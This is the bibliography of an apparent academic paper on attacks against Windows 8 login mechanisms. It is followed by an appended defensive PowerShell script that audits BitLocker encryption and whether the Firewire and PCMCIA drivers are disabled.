Delpy, B. 2011. Re – pass the pass. http://blog.gentilkiwi.com/securite/re-pass-the-pass. Accessed: 24.feb.2014.
Delpy, B. 2012. Re – re – pass the pass. http://blog.gentilkiwi.com/securite/rere-pass-the-pass. Accessed: 24.feb.2014.
Delpy, B. 2014a. Blog de Gentil Kiwi. http://blog.gentilkiwi.com. Accessed: 21.feb.2014.
Delpy, B. 2014b. mimikatz. http://blog.gentilkiwi.com/mimikatz. Accessed: 17.jan.2014.
Delpy, B. 2014c. mimikatz can now extract *PIN code* of smartcards associated with logon sessions. https://twitter.com/gentilkiwi/status/437719635404673025/photo/1. Accessed: 26.feb.2014.
Delpy, B. 2014d. Pass the pass. http://blog.gentilkiwi.com/securite/pass-the-pass. Accessed: 24.feb.2014.
Delpy, B. 2014e. Windows 8, code PIN et mot de passe image [Windows 8, PIN code and picture password]. http://blog.gentilkiwi.com/securite/mimikatz/windows-8-code-pin-mot-de-passe-image. Accessed: 23.jan.2014.
Delpy, B. 2014f. Windows 8, empreintes digitales [Windows 8, fingerprints]. http://blog.gentilkiwi.com/securite/mimikatz/windows-8-empreintes-digitales. Accessed: 24.jan.2014.
Dieterle, D. W. 2014. Basic Security Testing with Kali Linux, 1st ed. CreateSpace Independent Publishing Platform.
Falde, K. 2013. Restricted admin mode for RDP in Windows 8.1 / 2012 R2. http://blogs.technet.com/b/kfalde/archive/2013/08/14/restricted-admin-mode-for-rdp-in-windows-8-1-2012-r2.aspx. Accessed: 18.feb.2014.
Freerainbowtables. 2014. Rainbow tables available. https://www.freerainbowtables.com/en/tables2/. Accessed: 26.feb.2014.
Griffin, D. 2007. Create custom login experiences with credential providers for Windows Vista. http://msdn.microsoft.com/en-us/magazine/cc163489.aspx. Accessed: 24.feb.2014.
Hagen, P. N. 2014. Offline NT password and registry editor. http://pogostick.net/~pnh/ntpasswd/. Accessed: 23.feb.2014.
Hardware, T. 2010. System encryption: BitLocker and TrueCrypt compared. http://www.tomshardware.com/reviews/bitlocker-truecrypt-encryption,2587-9.html. Accessed: 24.jan.2014.
ISEE0XDEADDISKS. 2008. List of hard disk ATA master passwords. http://ipv5.wordpress.com/2008/04/14/list-of-hard-disk-ata-master-passwords/. Accessed: 21.feb.2014.
Long, J. and Mitnick, K. 2011. No Tech Hacking: A Guide to Social Engineering, Dumpster Diving, and Shoulder Surfing. Elsevier Science.
Lowe, M. 2013. New "Restricted Admin" feature of RDP 8.1 allows pass-the-hash. https://labs.portcullis.co.uk/blog/new-restricted-admin-feature-of-rdp-8-1-allows-pass-the-hash/. Accessed: 18.feb.2014.
Maartmann-Moe, C. 2011. Inception. http://www.breaknenter.org/projects/inception/. Accessed: 18.feb.2014.
McClure, S., Scambray, J., and Kurtz, G. 2009. Hacking Exposed: Network Security Secrets and Solutions. McGraw-Hill.
Microsoft. 2013. What's new in biometrics in Windows 8.1. http://technet.microsoft.com/library/dn344916.aspx. Accessed: 24.jan.2014.
Microsoft. 20xx. MSV1_0 authentication package. http://msdn.microsoft.com/en-us/library/windows/desktop/aa378753(v=vs.85).aspx. Accessed: 24.feb.2014.
Mythbusters. 2006. Fingerprint scanners are unbeatable. http://www.discovery.com/tv-shows/mythbusters/mythbusters-database/fingerprint-scanners-unbeatable.htm. Accessed: 18.feb.2014.
Passcape. 2011. LSA secrets in Windows. http://www.passcape.com/index.php?setLang=2&section=blog&cmd=details&id=15. Accessed: 21.feb.2014.
Passcape. 2012a. DPAPI secrets. Security analysis and data recovery in DPAPI (part 1). http://www.passcape.com/index.php?section=blog&cmd=details&id=20. Accessed: 21.feb.2014.
Passcape. 2012b. Security breach in Windows 7 and Windows 8 biometric authentication. http://www.passcape.com/index.php?section=blog&cmd=details&id=31. Accessed: 23.jan.2014.
Passcape. 2012c. Windows 8 stores logon passwords in plain-text. http://www.passcape.com/index.php?section=blog&cmd=details&id=27. Accessed: 7.jan.2014.
Passcape. 2014. Passcape. http://www.passcape.com. Accessed: 21.feb.2014.
Pilkington, M. 2012. Protecting privileged domain accounts: Disabling encrypted passwords. http://digital-forensics.sans.org/blog/2012/03/09/protecting-privileged-domain-accounts-disabling-encrypted-passwords. Accessed: 24.feb.2014.
Rapid7. 2011. Microsoft Windows authenticated administration utility. http://www.rapid7.com/db/modules/auxiliary/admin/smb/psexec_command. Accessed: 18.feb.2014.
Ronin. 2014. Passing the hash with remote desktop. http://www.kali.org/penetration-testing/passing-hash-remote-desktop/. Accessed: 18.feb.2014.
Skullsecurity. 2011. Passwords. https://wiki.skullsecurity.org/Passwords. Accessed: 21.feb.2014.
Spylogic. 2008. What is digest authentication? http://www.spylogic.net/2008/05/winlockpwn-more-then-a-partytrick/. Accessed: 20.feb.2014.
Superuser. 2012. How to get a screensaver at the Windows 7 login screen? http://superuser.com/questions/107200/how-to-get-a-screensaver-at-the-windows-7-login-screen. Accessed: 26.feb.2014.
thelead82. 2013. Kon-Boot for Windows. http://www.thelead82.com/products-win.html. Accessed: 17.jan.2014.
Wolthusen, S. D. 2014. Lecture slides, IMT4541 Foundations in Information Security.
xkcd. 2013. Password strength. https://xkcd.com/936/. Accessed: 24.jan.2014.
ZDNet. 2014. The history of Windows: A timeline. http://www.zdnet.com/the-history-of-windows-a-timeline-7000025145/. Accessed: 18.feb.2014.
Zhao, Z., Ahn, G.-J., Seo, J.-J., and Hu, H. 2013. On the security of picture gesture authentication. In Proceedings of the 22nd USENIX Conference on Security. USENIX Association, 383–398.
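As an added example that is not part of the paper, the following PowerShell script audits, on the local machine, two of the mitigations the conclusion recommends: that the operating system volume is protected by BitLocker (so the SAM and Vault files cannot be read from a removed disk), and that the Firewire (IEEE 1394) and PCMCIA drivers a locked, logged-in session can be attacked through are disabled. It assumes the BitLocker PowerShell module is available, and the driver service names 1394ohci, sbp2port and pcmcia are assumptions, not values taken from the paper.

```powershell
# Added example, not from the paper: audit the conclusion's mitigations locally.
# Run from an elevated PowerShell on Windows 8/8.1. Assumes the BitLocker module
# (Get-BitLockerVolume) is present; the driver service names are assumptions.

function Test-LoginMitigations {
    $findings = @()

    # 1. Full Disk Encryption: the OS volume must be fully encrypted with protection
    #    on, otherwise the SAM and Vault files can be read from the removed hard disk.
    $os = Get-BitLockerVolume -MountPoint $env:SystemDrive -ErrorAction Stop
    if ($os.VolumeStatus -ne 'FullyEncrypted' -or $os.ProtectionStatus -ne 'On') {
        $findings += "FDE: $($os.MountPoint) is $($os.VolumeStatus), protection $($os.ProtectionStatus)"
    }

    # 2. Firewire/PCMCIA: a driver whose Start value is 4 (SERVICE_DISABLED) is never
    #    loaded, so a locked, logged-in session cannot be attacked through that port.
    $drivers = [ordered]@{
        '1394ohci' = 'IEEE 1394 (Firewire) host controller'   # assumed service name
        'sbp2port' = 'SBP-2 protocol over IEEE 1394'           # assumed service name
        'pcmcia'   = 'PCMCIA bus driver'                       # assumed service name
    }
    foreach ($name in $drivers.Keys) {
        $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$name"
        if (-not (Test-Path $key)) { continue }   # driver not installed: nothing to load
        $start = (Get-ItemProperty -Path $key -Name Start -ErrorAction SilentlyContinue).Start
        if ($start -ne 4) {
            $findings += "DMA: $($drivers[$name]) ($name) can load (Start=$start); set Start=4"
        }
    }
    return $findings
}

# Wrap in @() so an empty result is still an array with a Count of 0.
$result = @(Test-LoginMitigations)
if ($result.Count -eq 0) {
    Write-Output 'All checked mitigations are in place.'
} else {
    $result | ForEach-Object { Write-Output "FINDING: $_" }
    exit 1
}
```

The non-zero exit code makes the script usable from a scheduled task or configuration check that flags machines where either mitigation has been turned off.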